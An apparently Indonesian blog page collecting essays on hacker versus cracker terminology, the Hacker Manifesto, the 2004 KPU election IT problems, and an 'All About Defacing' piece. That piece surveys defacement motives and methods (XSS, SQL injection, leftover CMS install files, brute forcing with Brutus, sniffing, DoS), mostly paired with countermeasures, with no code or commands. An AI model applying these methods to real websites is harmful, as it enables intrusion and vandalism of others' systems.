Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.
Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak

Read More..

=========
Pengantar
=========
Pernah suatu ketika pada tanggal 10 Agustus 2001 sebuah media massa online memberitakan mengenai hacker yang membobol dan men-deface (mengubah content maupun layout) beberapa situs di Internet dan memasang foto Tommy Soeharto di situs tersebut. Menurut media massa tersebut, aksi hacker tersebut adalah merupakan bantuan untuk menyebarluaskan dan menangkap Tommy Soeharto. Pada halaman yang di-deface tersebut, tertulis juga pesan “Hacked and deface not only a crime. This person is #1 criminal in our country”.


Kemudian belum lama berselang, tepatnya pada tanggal 16 Agustus 2001, beberapa perusahaan dotcom menyelenggarakan sebuah acara bertajuk HackersNight, di sebuah café di bilangan Jakarta Selatan. Acara HackersNight tersebut merupakan acara bulanan yang sudah mencapai putaran ke 12 di Jakarta. Acara party-party ala pebisnis dotcom tersebut juga dilangsungkan di Bandung dan Surabaya, dan sudah tentu dilaksanakan di sebuah café pula. Acara yang dilangsungkan hingga larut malam tersebut banyak menyajikan aneka hiburan, musik yang keras dan setumpuk hadiah dari para sponsor.
Bagi orang awam, kedua informasi tersebut tidaklah menunjukkan kejanggalan apapun. Toh memang akhirnya terminologi hacker bagi orang awam tidak mempunyai banyak arti dan tidak berpengaruh banyak dalam kehidupan sehari-hari mereka. Tetapi bagi pelaku dan pemain industri teknologi informasi (TI), atau setidaknya bagi pemerhati dan pecinta TI, penggunaan kata hacker untuk dua contoh kasus tersebut di atas bisa menjadi suatu diskusi yang panjang. Ada pertanyaan yang paling mendasar: “Sudah tepatkah penggunaan kata hacker tersebut?” Untuk menjawab pertanyaan tersebut, ada baiknya kita memahami terminologi hacker tersebut lebih jauh.
==================================
Sejarah Singkat Terminologi Hacker
==================================
Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.
Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos.
1 dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan. Pada tahun yang sama keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.
Kemudian pada tahun 1995 keluarlah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.
Pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.
==============================
Manifesto dan Kode Etik Hacker
==============================
Sebenarnya hacker memiliki manifesto dan kode etik yang menjadi patokan bagi hacker di seluruh dunia. Manifesto Hacker dibuat oleh seorang hacker yang menggunakan nickname The Mentor dan pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Manifesto Hacker tersebut adalah:
- Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
- Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
- Kami menjelajah, dan kalian sebut kami kriminal.
- Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
- Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
- Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
- Ya, aku memang seorang kriminal.
- Kejahatanku adalah rasa keingintahuanku.
- Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
- Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
- Aku memang seorang hacker, dan inilah manifesto saya.
- Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
- Bagaimanapun juga, kami semua senasib seperjuangan.
Hacker juga memiliki kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.
Kode etik hacker tersebut tertulis:
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali
2. Segala informasi haruslah gratis
3. Jangan percaya pada otoritas, promosikanlah desentralisasi
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.
==================
Hacker dan Cracker
==================
Sebenarnya secara lebih spesifik terminologi hacker telah dijelaskan dalam buku Hacker Attack karya Richard Mansfield tahun 2000. Menurut Mansfield, hacker didefinisikan sebagai seseorang yang memiliki keinginan untuk melakukan eksplorasi dan penetrasi terhadap sebuah sistem operasi dan kode komputer pengaman lainnya, tetapi tidak melakukan tindakan pengrusakan apapun, tidak mencuri uang atau informasi. Sedangkan cracker adalah sisi gelap dari hacker dan memiliki kertertarikan untuk mencuri informasi, melakukan berbagai macam kerusakan dan sesekali waktu juga melumpuhkan keseluruhan sistem komputer.
Perbedaan terminologi antar hacker dan cracker tersebut kini menjadi bias dan cenderung hilang sama sekali dalam perspektif media massa dan di masyarakat umum. Ada beberapa faktor penyebab hal tersebut:
- Para cracker tidak jarang menyebut diri mereka sebagai hacker
- Manifesto dan kode etik para hacker kerap pula dianggap sebagai manifesto dan kode etik bagi para cracker.
- Media massa menggunakan terminologi hacker secara salah kaprah dan hantam kromo
- Industri film mengangkat kehidupan hacker dari kacamata Hollywood
- Masyarakat melabelisasi kegiatannya menggunakan kata hacker agar lebih memiliki daya jual
Berdasarkan beberapa kondisi tersebut di atas, maka terminologi hacker memiliki pelebaran makna sedemikian rupa, sehingga kesalah-kaprahan kian hari kian menjadi-jadi. Setiap perilaku negatif yang dilakukan di Internet sering kali dikaitkan dengan istilah hacker, baik oleh media massa maupun masyarakat umum. Contohnya adalah pada paragraf pertama dan kedua tulisan ini. Perilaku men-defaced suatu situs nyata-nyata bukanlah modus operandi hacker. Hacker sejatinya tidak memiliki niatan atau tindakan yang sifatnya merusak.
Penggunaan kata hacker untuk sebuah acara party-party di café seperti contoh di atas juga merupakan satu bentuk pengaburan makna hacker yang sebenarnya. Acara HackersNight yang selalu digelar di café-café tersebut hanyalah merupakan ajang kumpul-kumpul pebisnis dotcom untuk bertukar kartu nama, menikmati hiburan dan bercengkerama hingga larut malam. Agak sulit jika ingin memperkirakan bahwa hacker yang sebenarnya akan menghadiri acara tersebut. Karena sejatinya seorang hacker kurang mau jati dirinya terekspos.
Berbeda bila kita berbicara mengenai ajang pertemuan hacker terbesar di dunia, Def Con, yang diadakan setahun sekali setiap pertengahan bulan Juli di Las Vegas. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktifitas hacking. Para hacker dari seluruh dunia tidak segan-segan untuk muncul setahun sekali dalam Def Con tersebut karena disitulah mereka dapat merasakan berada di komunitas hacker yang sesungguhnya, bukan sekedar labelisasi saja.
Walhasil, melihat beberapa kondisi di atas, akhirnya mau tidak mau terjadi kompromi dalam penggunaan istilah hacker. Sebagian orang ada memilih istilah hacker dan cracker, ada yang lebih nyaman menggunakan istilah hacker putih dan hacker hitam dan ada pula yang tetap menggunakan kata hacker untuk semua perilaku kriminalitas di Internet. Karena hacker yang sejati lebih banyak diam, cracker sering menyatakan dirinya sebagai hacker dan masyarakat umum lebih familiar dengan istilah hacker, akhirnya mau tidak mau media massa harus mengikuti selera pasar dengan ikut-ikutan mengeneralisir terminologi hacker.
*) Penulis adalah Koordinator ICT Watch dan jurnalis TI independen. Dapat dihubungi melalui e-mail donnybu@ictwatch.com. Tulisan ini pernah dimuat oleh majalah Neotek, Vol.II - No. 1, Oktober 2001. Tulisan ini bebas dikutip asal menyebutkan sumbernya.
—————————–
Biar Miskin Asal Sombong
oleh : Donny B.U. *
Saya sebenarnya sempat optimis bahwa komputer dan Internet, bisa menggantikan fungsi beberapa teknologi komunikasi lawas yang sudah kadung dikeloni oleh sekian ratus juta penduduk Indonesia. Toh memang di beberapa kondisi, hal tersebut sudah mulai terasa, walaupun masih malu-malu. Misalnya saja, ketika dulu yang namanya berkirim-kiriman pesan untuk menyatakan turut berbahagia ataupun turut berduka cita kerap disampaikan dalam bentuk tertulis di atas sebuah kertas yang dibungkus oleh amplop berperangko, kini banyak yang mengalihkannya ke jasa layanan pesan singkat (SMS) dengan biaya kurang dari gopek. Murah meriah, cepat tepat! Komunikasi antar benua pun sudah tidak perlu menunggu berhari-hari, cukup sampaikan melalui e-mail, maka detik itupun komunikasi sudah terjalin. Mau yang interaktif? Bisa gunakan fasilitas chatting, asal betah saja memahami maksud lawan bicara dengan cara membaca tulisan di monitor dan menjawabnya dengan cara mengetik.
Mau yang lebih revolusioner? Lengkapi saja perangkat komputer Anda dengan sound card, speaker dan microphone ala kadarnya. Modalnya paling banter di bawah gopekceng. Lalu instal software komunikasi berbasis Voice over Internet Protocol (VoIP), semisal Yahoo! Messenger, maka Anda sudah bisa bercuap-cuap dengan lawan bicara yang berada di mana saja di penjuru dunia. Syaratnya cuma akses Internet dan pulsa telepon lokal! Hebat bukan? Semangat komputerisasi dan Internetisasi ini yang selalu didengung-dengungkan oleh para pandai Internet kepada masyarakat awam. Pokoknya, apapun aktifitas Anda, hasilnya akan lebih murah-meriah cepat-tepat apabila menggunakan komputer dan Internet, alias teknologi informasi (TI)
Lah kok pada saat ajang unjuk diri TI terakbar di Indonesia pada awal April 2004 lalu, tepatnya saat proses penghitungan suara Pemilu 2004, hasilnya kok bertolak belakang dengan apa yang “ditempelkan” di jidat masyarakat tentang TI? Sistem komputerisasi Pemilu yang sedemikian canggihnya, dan tentunya sedemikian mahalnya, ternyata dirasakan melempem oleh masyarakat. Banyak anomali yang timbul, misalnya lambatnya pemrosesan data suara untuk dapat ditampilkan di pusat tabulasi nasional, berubahnya angka menjadi 0 semua atau terjadi lonjakan angka sekian puluh juta, hingga terubahnya nama partai di dalam sistem TI tersebut menjadi nama yang “aneh-tapi-nyata” lantaran sistem berharga ratusan miliar rupiah tersebut sempat disatroni oleh “orang iseng” yang juga menggunakan komputer dan Internet. Pihak KPU boleh mengeluarkan sejuta alasan teknis untuk pembelaan diri, toh masyarakat sudah kadung kecewa. Lagian apa kepentingannya masyarakat umum dengan alasan teknis?
Toh bagi mereka, yang penting hasilnya sesuai tidak dengan yang dijanjikan dan dengan biaya yang telah dikeluarkan. Masak iya, kecepatan hasil penghitungan suara secara komputer bisa setara dengan yang secara manual. Itu saja kok yang ada di benak masyarakat! Apalagi konon, seperti kerap menjadi bisik-bisik di masyarakat, sebuah lagu yang dipopulerkan oleh Elvis Presley, yaitu “Love Me Tender”, sangat populer di KPU. Mudah-mudahan kecewanya masyarakat lebih kepada manajemen KPU-nya, bukan kepada TI-nya.
Tapi tidak perlu terlalu heran. Nyatanya memang bangsa kita ini masih agak gamang, kagetan dan “gumunan” dengan perkembangan TI yang revolusioner di Indonesia. Memang, ada indikasi bahwa TI kita ini ujung-ujungnya adalah “menurut petunjuk” vendor saja. Bisa jadi mereka memang sebenarnya tidak peduli kita siap atau tidak, butuh atau tidak. Yang penting jualan mereka laku di negara dunia kedua dan ketiga, karena pasar di negara asal mereka sudah jenuh! Kan ada prinsip dasar marketing, yaitu ciptakan kebutuhan, apabila memang barang jualan kita sebenarnya belum menjadi kebutuhan yang mendesak di pasar. Makanya jangan heran, bila ada rekan Anda, atau mungkin Anda sendiri, yang punya ponsel lebih dari 1 buah. Padahal mulut kita hanya satu! Atau mungkin ada yang memiliki ponsel, notebook atau komputer tercanggih, tetapi optimalisasi fungsinya paling banter hanya 10% saja. Pokoknya canggih, pokoknya menjadi trend-setter, pokoknya up-to-date, dan pokoknya mahal!
Jadi, akhirnya memang KPU tidak terlalu salah jika sistem TI yang mereka bangun tersebut kurang dapat berfungsi secara optimal. Lah wong gamang, kagetan dan “gumunan” terhadap TI ini sudah menjadi penyakit bangsa kok! Toh kebetulan saja, KPU ini menjadi bola kristal untuk melihat kondisi yang ada. Jadi, mempertanyakan kebijakan KPU dengan komputerisasinya tersebut sama dengan mempertanyakan diri sendiri di depan cermin. Logikanya, menghujat KPU ya menghujat diri sendiri toh! Kan sudah menjadi kelaziman di masyarakat kita (dan di negara kita tentunya), bahwa kemampuan yang terbatas kerap kalah set dengan ego yang menggelora. Ibarat pepatah ala “warung kopi”, nafsu besar tenaga kurang, biar miskin asal sombong!
*) Penulis adalah Koordinator ICT Watch dan jurnalis TI independen. Dapat dihubungi melalui e-mail donnybu@ictwatch.com. Tulisan ini pernah dimuat oleh majalah Djakarta!, Juni 2004. Tulisan ini bebas dikutip asal menyebutkan sumbernya.

Read More..

All About Defacing

by Tugas Etika Profesi | 09.56 in | komentar (0)

Beberapa Alasan Defacing.

1. Dendam atau perasaan gak puas*
2. Kenikmatan tersendiri, 'defacer' merasa tertantang
3. Intrik politik, Sosial dsb

4. Penyampaian pesan tertentu
5. Iseng karena gak ada kerjaan dan pengen ngetop
6. prestice dalam golongan
7. .....
sisanya tambahin sendiri ,apabila ada motif yang anda ketahui dan tidak aku tuliskan, baik motif yang melatarbelakangi anda, saudara anda, teman anda untuk mendeface :), atau motif-motif yang anda ketahui!

Jenis-jenis pen-Deface-an

1. full of page

Artinya mendeface Satu halaman penuh tampilan depan alias file index atau file lainnya yang akan diubah (deface) secara utuh, artinya untuk melakukan ini biasanya seorang 'defacer' umumnya harus berhubungan secara 'langsung' dengan box (mesin) atau usaha mendapatkan priveleged terhadap mesin, baik itu root account or sebagainya yang memungkinkan defacer dapat secara interaktif mengendalikan file indek dan lainnya secara utuh.umumnya dengan memanfaatkan kelemahan kelemahan pada services services yang berjalan di mesin, sehingga dapat melakukan pengaksesan ke mesin.

Cara-cara yang ditempuh umumnya sama dengan step-step yang dilakukan untuk melakukan "hack in to the machine" yang sudah banyak di tulis dan diterjemahkan bahkan di bahas di artikel artikel yang dirilis baik secara resmi atau 'underground' . penulis pernah membaca karya Onno W purbo. (ini yang di inget :) )so, karena bukan ini yang akan kita bahas pada artikel ini maka,lanjut!

ups !! ntar dulu! caranya boleh sama, hacking, defacing dan cracking, tetapi! hasil akhirnya yang menentukan apakah itu cracker, hacker or defacer yang melakukannya.


2. Sebagian atau hanya menambahi

Artinya, defacer mendeface suatu situs tidak secara penuh, bisa hanya dengan menampilkan beberapa kata, gambar atau penambahan script script yang mengganggu, hal ini umumnya hanya akan memperlihatkan tampilan file yang di deface menjadi kacau dan umumnya cukup mengganggu, defacer biasanya mencari celah baik dari kelemahan scripting yang digunakan dengan XSS injection (bisa merefer ke artikel yang di buat oleh theday, bisa dengan SQL atau database injection dan juga beberapa vulnerabilities yang seringkali ditemukan pada situs situs yang dibangun dengan menggunakan CMS (content Manajemen System)

berbagai contoh XSS dapat di lihat di berbagai web, atau bisa dilihat di http://forum.echo.or.id bagian proof of concept disitu terdapat beberapa contoh XSS dan metoda lainnya yang ditujukan untuk "pendidikan" saja (pembuktian !! ).


Defacing umumnya dapat terjadi dikarenakan:

Internal


1. Kesalahan konfigurasi
Setiap kali aku membaca buku, artikel ataupun literatur tentang 'security' maka hal ini yang selalu di letakkan sebagai peyebab utama kelemahan suatu sistem yang telah di ciptakan;
pernah dengar kata kata " firewall yang tidak di konfiguraskan dengan baik bukanlah merupakan firewall"

jadi tidak peduli software apapun atau sistem apapun yang di akan terapkan! maka apabila tidak di konfigurasikan dengan baik malah akan menjadi 'bumerang' bagi sistem itu sendiri.bisa jadi sesuai dengan istilah 'pagar makan tanaman' :P

+ cara menanggulanginya

Ada baiknya berhati hati dalam mengkonfigurasi, sesuaikan semua kebutuhan dengan peripheral + SDM yang dimiliki untuk dapat dihasilkan semua policy yang dahsyat!

2. kelalaian admin
Apabila Konfigurasi telah sesuai, maka faktor ' man behind the gun' yang akan berbicara banyak; sehingga faktor internal kedua adalah manusia yang menggelola server tersebut: adpun jenis kelalaian yang dapat terjadi adalah :

- install file && folder
webmaster atau admin biasanya lalai dalam menghapus file yang digunakan untuk menginstallasi portal web model CMS
ex : folder /install,dan file install.php pada phpnuke, postnuke, phpbb, dsb

+ untuk menanggulanginnya : ada baiknya seorang administrator membaca manual (kerjaan admin!!) modul CMS yang di gunakan dan melakukan uji silang (cross check) alias "posisikan anda sebagai attacker"

- file konfigurasi && permision
webmaster atau admin lupa mengatur permisi pada file file konfigurasi yang penting, yang menyangkut administrasi dan konfigurasi file, khususnya file-file yang mencatat
password, baik password database dsb.
ex: file config.txt, config.php, config.inc

+ untuk menanggulanginya
biasanya di gunakan perintah chmod pada file dan folder chown dan chattr

- run of date
Terlalu lama peng-update-an suatu web atau tidak secara terus-terusan mengupdate webnya khususnya portal yang dibundel dalam CMS, serta juga packet packet yang terinstalasi di mesin baik itu web server sendiri , database server dan sebagainya yang bisa menjadi pintu masuk bagi 'defacer'.

+ untuk menanggulanginya, anda cuma perlu rajin rajin dan rutin menggunjungi situs situs yang menyediakan update dari packet yang digunain. (yang jelas OL mulu man!!!)

- run of services
kesalahan konfigurasi terhadap services/layanan yang diberikan khususnya terlalu banyak menjalankan layanan yang tidak diperlukan pada setiap server.

services ===> port
semakin banyak layanan yang di jalankan maka akan semakin banyak port yang di gunakan untuk melayani layanan tersebut, sehingga semakin banyak yang perlu diperhatikan. Pengkerucutan atau minimalisir layanan adalah cara yang dapat di lakukan.

+ cara menanggulanginya
Audit semua sistem anda sebelum di 'launch' cek semua services yang berjalan dan sesuaikan dengan kebutuhan!


- cannot keep secret
berkaitan dengan "social engineering", maka kepercayaan adalah hal terpenting, "TRusT NO BODY" mungkin pilihan yang sangat masuk akal dalam menanggulangi hal ini. Pribadi dan mental seorang webmaster atau admin sangat menentukan!

+ cara menanggulanginya ,
keep your own secret alias "inget man!! lo tu admin! bukan tukang gosip yang EMBERRRR" :P

- Kurang berhati-hati saat login ke mesin dsb
Sniffing yang dilakukan dari jaringan lokal sangat berkemungkinan untuk mendapatkan password yang di pakai oleh r00t, admin, webmaster dsb.

+ cara menanggulanginya

setting server anda untuk menolak melakukan login baik remote dan lokal untuk tidak gak!! berhenti aja jadi admin :P ), gunakan perintah substitute. untuk login secara remote upayakan penggunaan SSH dan SSL, beberapa konfigurasi mungkin dapat berguna untuk menanggulanginya, baik konfigurasi pc yang boleh akses remote baik berdasar ip, konfigurasi di jaringan, firewall dsb

- etc, goes here (lain-lain tambah disini :P) ...

3. pengkhianatan

Apabila anda sering membaca, mendengar atau berdiskusi tentang berbagai kebocoran mungkin hal ini sudah menjadi maklum bagi anda semua.Apalagi bagi anda yang pernah membaca buku 'art of deception' karangan kevin mitnick maka anda akan memahami betapa besarnya kebocoran yang tercipta dari penggunaan metoda tersebut.Bayangkan jika hal tersebut terjadi dikarenakan unsur kesengajaan ?

Mungkin terlalu sangar juga kata kata itu (hehe), tetapi apa boleh buat, hal ini pernah terjadi bahkan sering terjadi. mungkin juga beberapa intrik politis dan sosial sudah bergabung didalamnya, so sangat mungkin hal ini terjadi.adapun beberapa individu yang mungkin terkena :

1.Administrator
2.Second Admin /Staff
3.WebMaster
4.User yang terdapat di mesin Server
5......

Kenapa hal ini aku masukkan, padahal lebih nggak teknis (embeer)ini juga patut di waspadai lho, beberapa persen kasus terjadi di karenakan oleh perbuatan orang 'dalam'

+cara menanggulanginya
seperti perkataan teman saya , z3r0byt3 : "TRUST NO BODY" :P :)
mungkin berguna buat anda semua. ( udah 2 kali di sebut neh :P)



Eksternal


1. sofware vulnerabilities
Apa itu software Vulnerabilties ?
Software vulnerabilities disini adalah kelemahan, atau kesalahan yang dimiliki oleh software/program yang dipakai baik secara sengaja atau tidak sengaja.

Khususnya software-software Open source / atau yang berlicensi GPL, maka tidaklah aneh apabila dalam hitungan hari, atau malah jam dapat diketahui kelemahan suatu software. Banyak situs yang membahas dan melaporkan vulnerabilities suatu software baik itu situs resmi software tersebut atau situs situs keamaanan, info ini bisa menjadi 'senjata ampuh bagi para 'defacer' atau bahkan bisa menjadi perisai ampuh bagi webmaster atau admin.

+ cara menanggulanginya
jangan jadi kuper!! alias rajin rajin browsing untuk menggunjungi situs resmi software software yang anda gunakan , baca berita 'security' buatlah ikatan antara pakai secara khusus dan komunitas opensource secara umum. sehingga kamu gak merasa di tinggalkan. jangan takut!! bisa jadi kebocoran itu ditemukan tetapi dlam waktu cepat juga bisa ditemukan 'obatnya' :P

lakukan semua langkah langkah penting, apakah menonaktifkan fiture atau fasilitas tertentu yang dijalankan; yang diketahui 'bolong' dan belum dimiliki atau di temukan. atau diskusikan!! you have the community now!


2. sistem vulnerabilities
Sistem vulnerabilities?
mungkin hanya penggunaan kata yang sedikit pribadi sehingga memisahkan sistem dan software. pemisahan ini hanya agar membuat kita lebih jelas. baiklah!, apa yang aku maksud sistem disini adalah ? bisa disebut sistem operasi dari server khususnya 'kernel' yang dikembangkan oleh pengembang khusus kernel (http://kernel.org) sehingga bukannya tidak mungkin kebocoran ini di perbaiki oleh selain developer, tetapi umumnya untuk semua OS yang di gunakan (apalagi win****) maka versi 'stable' lah yang di tunggu tunggu! kenapa? apabila kita menggunakan Bind dan ternyata tidak stabil kita bisa gunakan DJBDNS, kalo postfix masih vulnerable kita bisa cepat cepat beralih ke qmail, tapi kalo kernel belum stabil maka?

vulnerablenya suatu kernel biasanya berpengaruh pada versi versi dibawahnya sehingga kemunggkinan penggunaan kernel versi lain pun akan mustahil. kasus seperti ini cukup jarang, umumnya cara yang ditempuh bisa dilakukan secara lokal /local exsploit (kasus yang terjadi baru baru ini : mremap)
kecuali* exploitasi pada 'DCOM RPC' yang berakibat kesalahan itu bisa di eksploitasi secara remote dan berbahaya sekali bagi mesin dikarenakanakan memberikan akses administrator (baca eksploitasi pada DCOM RPC win*)


+ cara menanggulanginya
1. seperti biasa pergi ke situs penyedia sistem operasi (kernel) untuk info dan patch yang disediakan
2. ke situs-situs 'security , cari kelemahannya usahakan melakukan penanggulangan semampunya.
3. Diskusikan di komunitas


3. run of control
Run of control disini aku maksudkan sebagai suatu kesulitan untuk melakukan Kontrol terhadap beberapa metoda serangan tertentu oleh administrator , hal ini bisa dikarenakan penggunaan beberapa fasilitas atau metode serangan yang cukup relatif sulit untuk di elakkan.

serangan-serangan ini sangat umum di ketahui, diantaranya:

1. Brute forcing
Brute force attack adalah jenis serangan yang dilakukan dengan melakukan berbagai bentuk kombinasi karakter yang akan di cobakan sebagai password detil soal BFA (brute force attack) dapat di baca pada artikel artikel yang khusus membahas soal bruteforcing.

metode ini mungkin yang paling kekal, alias sudah lama tetapi tetap dipakai dikarenakan kelebihannya yaitu tidak perlu mengetahui sistem enkripsi, atau metod apengamanan khususnya untuk login. tetapi memiliki berbagai 'keterbatasan tersendiri, baik dalam hal kecepatan khususnya.

ex : penggunaan brutus sebagai program yang cukup ampuh untuk membrute password baik, ftp, http, smtp dsb

2. Dictionarry attack
kenapa aku buat terpisah dengan Brute forcing, dikarenakan metode ini menggunakan kamus kata yang sering di gunakan, walau tetap memiliki prinsip yang sama dengan Brute forcing. target serangan ini adalah password , atau bis adikatakan attack terhadap authentication

3. DOS attack
Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu)

kenapa serangan ini aku masukkan karena salah satu tujuan dari kegiatan defacing adalah untuk melakukan kegiatan yang mengakibatkan user kesulitan mendapatkan info dari situs situs yang vital, seperti situs surat kabar,perbankan, pemerintahan, dsb

apabila terlalu sulit untuk merubah tampilannya (deface) maka tak jarang situs tersebut di buat ' tidur' (downkan) agar tak bisa beraktivitas dan menghambat interaksi terhadap user/pelanggan.

pembahasan mengenai DOS dan DDOS dapat dilihat di artikel yang ditulis oleh moby baik apa itu dos, jenisnya software dan cara menanggulanginya.
adapun kelemahan metode ini adalah penggunaan resource secara 'boros' yang secara tidak langsung akan menyulitkan 'attacker' itu sendiri

4. Sniffing.
kegiatan ini cukup berbahaya, seperti saya bahas di atas. Kegiatan ini sulit di elakkan, tetapi dapat di tanggulangi dengan beberapa cara di atas.
biasanya di gunakan ettercap, ethereal, dsb

5. Scanning yang dilakukan baik terhadap mesin, port protokol dan services yang dijalankan.
+ dapat di tanggulangi dengan menggunakan portsentry (*nix)
6. etc goes here..


Read More..

Ketika saya membaca sebuah tulisan tentang hacker dan cracker, beberapa hari yang lalu, saya tersadarkan akan kesalahan penafsiran saya pada dua istilah tersebut dalam dunia cyberspace. Awalnya saya beranggapan bahwa hacker adalah cracker itu sendiri. Atau sama-sama mengusung sebuah "penamaan" untuk membobol mekanisme dan kinerja komputer orang lain. Hal itu pula lah yang kemudian menggiring kesadaran saya untuk mencoba berselancar di dalam internet selama berjam-jam, mengeprin beberapa naskah yang berkaitan dengan itu dan mencoba berkomunikasi dengan orang lain dalam arena chating.

Satu pertanyaan yang saya ajukan pada mereka adalah, apa itu hacker?

Dan tragisnya, apa yang mereka jawab hampir sama dengan apa yang saya miliki, yakni seorang hacker adalah penyusup yang sengaja masuk pada jaringan komputer milik orang lain secara ilegal dan "mengacak-ngacak" dokumen didalamnya. Lalu apa itu cracker? Jawabannya pun nyaris sama. Intinya, baik hacker maupun cracker adalah para penyusup yang harus di waspadai keberadaanya. Kalau kedua istilah itu punya arti yang sama, maka pasti ada yang salah dengan pendefinisian keduanya.

Lalu, dimana letak kesalahan dari pendefinisian kedua istilah yang kerap hinggap ditelinga kita ini? Apalagi semenjak ada kabar bahwa "KPU-online" dibobol oleh para "hacker" beberapa bulan kebelakang. Benarkah itu adalah pekerjaan seorang hacker? Atau pekerjaan seorang cracker?

Tulisan ini mencoba menjawab dua istilah yang tidak asing ditelinga kita tersebut dengan wacana seorang pembelajar murni. Artinya, saya bukan dari kedua golongan tadi. Walaupun pada akhirnya menjadi tertarik untuk sekedar tahu aktifitas mereka (para hacker & cracker) sebagai satu ilmu yang menarik dalam dunia IT beberapa tahun ini.

PERSOALAN DASAR

Hacker dalam tulisan Eric Steven Raymond adalah " there is a community, a shared culture, of expert programmers and networking wizards that its history back trough decades to the firs time-sharing minicomputers and the earliesr ARPAnet experiment"

Dengan kata lain, Raymon mengatakan, "the members of this culture originated the term 'hacker'". Para hackerlah yang kemudian memperkenalkan internet, membuat program sistem operasi UNIX hingga bisa digunakan saat ini. Dan para hacker pula lah yang telah berjasa dalam menjalankan World Wide Web sehingga dapat dinikmati oleh semua orang di seluruh dunia di belahan manapun dia berada asal terkoneksi pada internet.

Lebih lanjut Raymon mengatakan " jika anda berada pada komunitas ini dan jika anda memiliki konstribusi didalamnya, dan kemudian orang mengenal anda sebagai hacker, maka anda adalah seorang hacker".

Sekilas dari pandangan Raymon kita dapat satu definisi bahwa seorang hacker bukanlah orang yang jahat seperti yang kita pikirkan selama ini. Ya, jika mereka memang bisa masuk kedalam komputer kita (malalui jaringan internet) karena mereka bisa menguasai ilmunya. Namun jika ada orang yang kemudian masuk secara ilegal kedalam komputer kita dan kemudian "mencuri dan mengacak-ngacak" data kita, mereka adalah CRACKER. Dan bisa jadi mereka adalah seorang hacker dalam dunia yang berbeda. Dengan kata lin, mereka semua adalah para ahli dalam hal teknologi informasi ini dan berkecimpung serius didalamnya.

Namun untuk menghindari kerancuan, maka sebuah kata kunci dalam masalah ini, menurut Raymon adalah perbedaan antara keduanya; seorang Hacker adalah dia yang membangun sistem, sementara seorang Cracker malah "menghancurkannya". (How to become a hacker, Eric S. Raymond, 2001).

